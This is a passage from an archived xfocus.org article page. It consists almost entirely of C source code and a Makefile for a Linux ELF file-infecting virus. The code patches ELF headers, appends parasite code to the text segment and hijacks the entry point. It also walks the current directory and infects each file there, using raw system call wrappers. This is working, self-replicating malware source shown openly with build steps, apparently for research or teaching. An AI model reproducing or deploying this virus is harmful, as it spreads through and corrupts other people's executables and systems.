763.html

里面收集的是发表在www.xfocus.org上的文章

&gt; phdr[txt_index+1].p_vaddr) { <br />
V_DEBUG_WRITE(1, &amp;luck, sizeof(luck)); <br />
goto err; <br />
} <br />
<br />
break; <br />
} <br />
txt_index++; <br />
} <br />
<br />
/* Modify the entry point of the ELF */ <br />
org_entry = ehdr-&gt;e_entry; <br />
ehdr-&gt;e_entry = phdr[txt_index].p_vaddr + phdr[txt_index].p_filesz; <br />
<br />
new_code_pos = <br />
(void *) ehdr + phdr[txt_index].p_offset + phdr[txt_index].p_filesz; <br />
<br />
/* Increase the p_filesz and p_memsz of text segment <br />
* for new code */ <br />
phdr[txt_index].p_filesz += align_code_size; <br />
phdr[txt_index].p_memsz += align_code_size; <br />
<br />
for (i = 0; i &lt; ehdr-&gt;e_phnum; i++) <br />
if (phdr[i].p_offset &gt;= (unsigned long) new_code_pos - (unsigned long) ehdr) <br />
phdr[i].p_offset += align_code_size; <br />
<br />
tmp_flag = 0; <br />
for (i = 0; i &lt; ehdr-&gt;e_shnum; i++) { <br />
if (shdr[i].sh_offset &gt;= (unsigned long) new_code_pos - (unsigned long) ehdr) { <br />
shdr[i].sh_offset += align_code_size; <br />
if (!tmp_flag &amp;&amp; i) { /* associating the new_code to the last <br />
* section in the text segment */ <br />
shdr[i-1].sh_size += align_code_size; <br />
tmp_flag = 1; <br />
} <br />
} <br />
} <br />
<br />
/* Increase p_shoff in the ELF header */ <br />
ehdr-&gt;e_shoff += align_code_size; <br />
<br />
/* Make a new file */ <br />
tmp_fd = g_open(tmpfile, O_WRONLY|O_CREAT|O_TRUNC, stat.st_mode); <br />
if (tmp_fd == -1) { <br />
goto err; <br />
} <br />
<br />
size = new_code_pos - (void *) ehdr; <br />
if (g_write(tmp_fd, ehdr, size) != size) <br />
goto err; <br />
<br />
__memcpy(tmp_v_code, v_code, v_code_size); <br />
__memcpy(tmp_v_code + v_retaddr_addr_offset, &amp;org_entry, sizeof(org_entry)); <br />
if (g_write(tmp_fd, tmp_v_code, align_code_size) != align_code_size) { <br />
goto err; <br />
} <br />
<br />
if (g_write(tmp_fd, (void *) ehdr + size, stat.st_size - size) <br />
!= stat.st_size - size) { <br />
goto err; <br />
} <br />
<br />
g_close(tmp_fd); <br />
g_munmap(ehdr, stat.st_size); <br />
g_close(fd); <br />
<br />
if (g_rename(tmpfile, file) == -1) { <br />
goto err; <br />
} <br />
<br />
return 0; <br />
err: <br />
if (tmp_fd != -1) <br />
g_close(tmp_fd); <br />
if (ehdr) <br />
g_munmap(ehdr, stat.st_size); <br />
if (fd != -1) <br />
g_close(fd); <br />
return -1; <br />
} <br />
<br />
static inline void virus_code(void) <br />
{ <br />
char dirdata[4096]; <br />
struct dirent *dirp; <br />
int curfd; <br />
int nbyte, c; <br />
unsigned long para_code_start_addr; <br />
<br />
__asm__ volatile ( <br />
&quot;push %%eax\n\t&quot; <br />
&quot;push %%ecx\n\t&quot; <br />
&quot;push %%edx\n\t&quot; <br />
::); <br />
<br />
char curdir[2] = {&#39;.&#39;, 0}; <br />
char newline = &#39;\n&#39;; <br />
<br />
curdir[0] = &#39;.&#39;; <br />
curdir[1] = 0; <br />
newline = &#39;\n&#39;; <br />
<br />
if ((curfd = g_open(curdir, O_RDONLY, 0)) &lt; 0) <br />
goto out; <br />
<br />
/* Get start address of virus code */ <br />
__asm__ volatile ( <br />
&quot;jmp get_start_addr\n&quot; <br />
&quot;infect_start:\n\t&quot; <br />
&quot;popl %0\n\t&quot; <br />
:&quot;=m&quot; (para_code_start_addr) <br />
:); <br />
para_code_start_addr -= PARACODE_RETADDR_ADDR_OFFSET - 1; <br />
<br />
/* Infecting */ <br />
while ((nbyte = g_getdents(curfd, (struct dirent *) <br />
&amp;dirdata, sizeof(dirdata))) &gt; 0) { <br />
c = 0; <br />
dirp = (struct dirent *) &amp;dirdata; <br />
do { <br />
V_DEBUG_WRITE(1, dirp-&gt;d_name, dirp-&gt;d_reclen - (unsigned long) <br />
&amp;(((struct dirent *) 0)-&gt;d_name)); <br />
V_DEBUG_WRITE(1, &amp;newline, sizeof(newline)); <br />
<br />
infect_virus(dirp-&gt;d_name, <br />
(void *) para_code_start_addr, <br />
PARACODE_LENGTH, <br />
PARACODE_RETADDR_ADDR_OFFSET); <br />
<br />
c += dirp-&gt;d_reclen; <br />
if (c &gt;= nbyte) <br />
break; <br />
dirp = (struct dirent *)((char *)dirp + dirp-&gt;d_reclen); <br />
} while (1); <br />
} <br />
g_close(curfd); <br />
out: <br />
__asm__ volatile ( <br />
&quot;popl %%edx\n\t&quot; <br />
&quot;popl %%ecx\n\t&quot; <br />
&quot;popl %%eax\n\t&quot; <br />
&quot;addl $0x102c, %%esp\n\t&quot; <br />
&quot;popl %%ebx\n\t&quot; <br />
&quot;popl %%esi\n\t&quot; <br />
&quot;popl %%edi\n\t&quot; <br />
&quot;popl %%ebp\n\t&quot; <br />
&quot;jmp return\n&quot; <br />
&quot;get_start_addr:\n\t&quot; <br />
&quot;call infect_start\n&quot; <br />
&quot;return:\n\t&quot; <br />
&quot;push $0xAABBCCDD\n\t&quot; /* push ret_addr */ <br />
&quot;ret\n&quot; <br />
::); <br />
} <br />
<br />
void parasite_code(void) <br />
{ <br />
virus_code(); <br />
} <br />
void parasite_code_end(void) {parasite_code();} <br />
------------------------------ gvirus.c ------------------------------ <br />
<br />
------------------------------ gunistd.h ------------------------------ <br />
#ifndef _G2_UNISTD_ <br />
#define _G2_UNISTD_ <br />
<br />
#define g__syscall_return(type, res) \ <br />
do { \ <br />
if ((unsigned long)(res) &gt;= (unsigned long)(-125)) { \ <br />
res = -1; \ <br />
} \ <br />
return (type) (res); \ <br />
} while (0) <br />
<br />
#define g_syscall0(type,name) \ <br />
type g_##name(void) \ <br />
{ \ <br />
long __res; \ <br />
__asm__ volatile (&quot;int $0x80&quot; \ <br />
: &quot;=a&quot; (__res) \ <br />
: &quot;0&quot; (__NR_##name)); \ <br />
g__syscall_return(type,__res); \ <br />
} <br />
<br />
#define g_syscall1(type,name,type1,arg1) \ <br />
type g_##name(type1 arg1) \ <br />
{ \ <br />
long __res; \ <br />
__asm__ volatile (&quot;int $0x80&quot; \ <br />
: &quot;=a&quot; (__res) \ <br />
: &quot;0&quot; (__NR_##name),&quot;b&quot; ((long)(arg1))); \ <br />
g__syscall_return(type,__res); \ <br />
} <br />
<br />
#define g_syscall2(type,name,type1,arg1,type2,arg2) \ <br />
type g_##name(type1 arg1,type2 arg2) \ <br />
{ \ <br />
long __res; \ <br />
__asm__ volatile (&quot;int $0x80&quot; \ <br />
: &quot;=a&quot; (__res) \ <br />
: &quot;0&quot; (__NR_##name),&quot;b&quot; ((long)(arg1)),&quot;c&quot; ((long)(arg2))); \ <br />
g__syscall_return(type,__res); \ <br />
} <br />
<br />
#define g_syscall3(type,name,type1,arg1,type2,arg2,type3,arg3) \ <br />
type g_##name(type1 arg1,type2 arg2,type3 arg3) \ <br />
{ \ <br />
long __res; \ <br />
__asm__ volatile (&quot;int $0x80&quot; \ <br />
: &quot;=a&quot; (__res) \ <br />
: &quot;0&quot; (__NR_##name),&quot;b&quot; ((long)(arg1)),&quot;c&quot; ((long)(arg2)), \ <br />
&quot;d&quot; ((long)(arg3))); \ <br />
g__syscall_return(type,__res); \ <br />
} <br />
<br />
#define g_syscall4(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4) \ <br />
type g_##name (type1 arg1, type2 arg2, type3 arg3, type4 arg4) \ <br />
{ \ <br />
long __res; \ <br />
__asm__ volatile (&quot;int $0x80&quot; \ <br />
: &quot;=a&quot; (__res) \ <br />
: &quot;0&quot; (__NR_##name),&quot;b&quot; ((long)(arg1)),&quot;c&quot; ((long)(arg2)), \ <br />
&quot;d&quot; ((long)(arg3)),&quot;S&quot; ((long)(arg4))); \ <br />
g__syscall_return(type,__res); \ <br />
} <br />
<br />
#define g_syscall5(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4, \ <br />
type5,arg5) \ <br />
type g_##name (type1 arg1,type2 arg2,type3 arg3,type4 arg4,type5 arg5) \ <br />
{ \ <br />
long __res; \ <br />
__asm__ volatile (&quot;int $0x80&quot; \ <br />
: &quot;=a&quot; (__res) \ <br />
: &quot;0&quot; (__NR_##name),&quot;b&quot; ((long)(arg1)),&quot;c&quot; ((long)(arg2)), \ <br />
&quot;d&quot; ((long)(arg3)),&quot;S&quot; ((long)(arg4)),&quot;D&quot; ((long)(arg5))); \ <br />
g__syscall_return(type,__res); \ <br />
} <br />
<br />
#define g_syscall6(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4, \ <br />
type5,arg5,type6,arg6) \ <br />
type g_##name (type1 arg1,type2 arg2,type3 arg3,type4 arg4,type5 arg5,type6 arg6) \ <br />
{ \ <br />
long __res; \ <br />
__asm__ volatile (&quot;push %%ebp ; movl %%eax,%%ebp ; movl %1,%%eax ; int $0x80 ; pop %%ebp&quot; \ <br />
: &quot;=a&quot; (__res) \ <br />
: &quot;i&quot; (__NR_##name),&quot;b&quot; ((long)(arg1)),&quot;c&quot; ((long)(arg2)), \ <br />
&quot;d&quot; ((long)(arg3)),&quot;S&quot; ((long)(arg4)),&quot;D&quot; ((long)(arg5)), \ <br />
&quot;0&quot; ((long)(arg6))); \ <br />
g__syscall_return(type,__res); \ <br />
} <br />
<br />
#endif /* _G2_UNISTD_ */ <br />
------------------------------ gunistd.h ------------------------------ <br />
<br />
------------------------------ gsyscall.h ------------------------------ <br />
<br />
#ifndef _G2_SYSCALL_ <br />
#define _G2_SYSCALL_ <br />
<br />
#include &lt;sys/types.h&gt; <br />
#include &lt;sys/mman.h&gt; <br />
<br />
#include &lt;linux/unistd.h&gt; <br />
#include &lt;linux/fcntl.h&gt; <br />
<br />
#include &quot;gunistd.h&quot; <br />
<br />
#define NULL 0 <br />
<br />
struct dirent { <br />
long d_ino; <br />
unsigned long d_off; <br />
unsigned short d_reclen; <br />
char d_name[256]; /* We must not include limits.h! */ <br />
}; <br />
<br />
struct stat { <br />
unsigned long st_dev; <br />
unsigned long st_ino; <br />
unsigned short st_mode; <br />
unsigned short st_nlink; <br />
unsigned short st_uid; <br />
unsigned short st_gid; <br />
unsigned long st_rdev; <br />
unsigned long st_size; <br />
unsigned long st_blksize; <br />
unsigned long st_blocks; <br />
unsigned long st_atime; <br />
unsigned long st_atime_nsec; <br />
unsigned long st_mtime; <br />
unsigned long st_mtime_nsec; <br />
unsigned long st_ctime; <br />
unsigned long st_ctime_nsec; <br />
unsigned long __unused4; <br />
unsigned long __unused5; <br />
}; <br />
<br />
static inline g_syscall3(int, write, int, fd, const void *, buf, off_t, count); <br />
static inline g_syscall3(int, getdents, uint, fd, struct dirent *, dirp, uint, count); <br />
static inline g_syscall3(int, open, const char *, file, int, flag, int, mode); <br />
static inline g_syscall1(int, close, int, fd); <br />
static inline g_syscall6(void *, mmap2, void *, addr, size_t, len, int, prot, <br />
int, flags, int, fd, off_t, offset); <br />
static inline g_syscall2(int, munmap, void *, addr, size_t, len); <br />
static inline g_syscall2(int, rename, const char *, oldpath, const char *, newpath); <br />
static inline g_syscall2(int, fstat, int, filedes, struct stat *, buf); <br />
<br />
static inline void * __memcpy(void * to, const void * from, size_t n) <br />
{ <br />
int d0, d1, d2; <br />
__asm__ __volatile__( <br />
&quot;rep ; movsl\n\t&quot; <br />
&quot;testb $2,%b4\n\t&quot; <br />
&quot;je 1f\n\t&quot; <br />
&quot;movsw\n&quot; <br />
&quot;1:\ttestb $1,%b4\n\t&quot; <br />
&quot;je 2f\n\t&quot; <br />
&quot;movsb\n&quot; <br />
&quot;2:&quot; <br />
: &quot;=&amp;c&quot; (d0), &quot;=&amp;D&quot; (d1), &quot;=&amp;S&quot; (d2) <br />
:&quot;0&quot; (n/4), &quot;q&quot; (n),&quot;1&quot; ((long) to),&quot;2&quot; ((long) from) <br />
: &quot;memory&quot;); <br />
return (to); <br />
} <br />
<br />
#endif /* _G2_SYSCALL_ */ <br />
------------------------------ gsyscall.h ------------------------------ <br />
<br />
------------------------------ foo.c ------------------------------ <br />
#include &lt;stdio.h&gt; <br />
<br />
int main() <br />
{ <br />
puts(&quot;real elf point&quot;); <br />
return 0; <br />
} <br />
------------------------------ foo.c ------------------------------ <br />
<br />
------------------------------ Makefile ------------------------------ <br />
all: foo gei <br />
gei: g-elf-infector.c gvirus.o <br />
gcc -O2 $&lt; gvirus.o -o gei -Wall -DNDEBUG <br />
foo: foo.c <br />
gcc $&lt; -o foo <br />
gvirus.o: gvirus.c <br />
gcc $&lt; -O2 -c -o gvirus.o -fomit-frame-pointer -Wall -DNDEBUG <br />
clean: <br />
rm *.o -rf <br />
rm foo -rf <br />
rm gei -rf <br />
------------------------------ Makefile ------------------------------
	</td>
  </tr>
</table>
<div class="footer">
  Copyright &copy; 1998-2003 XFOCUS Team. All Rights Reserved
</div>
</body>
</html>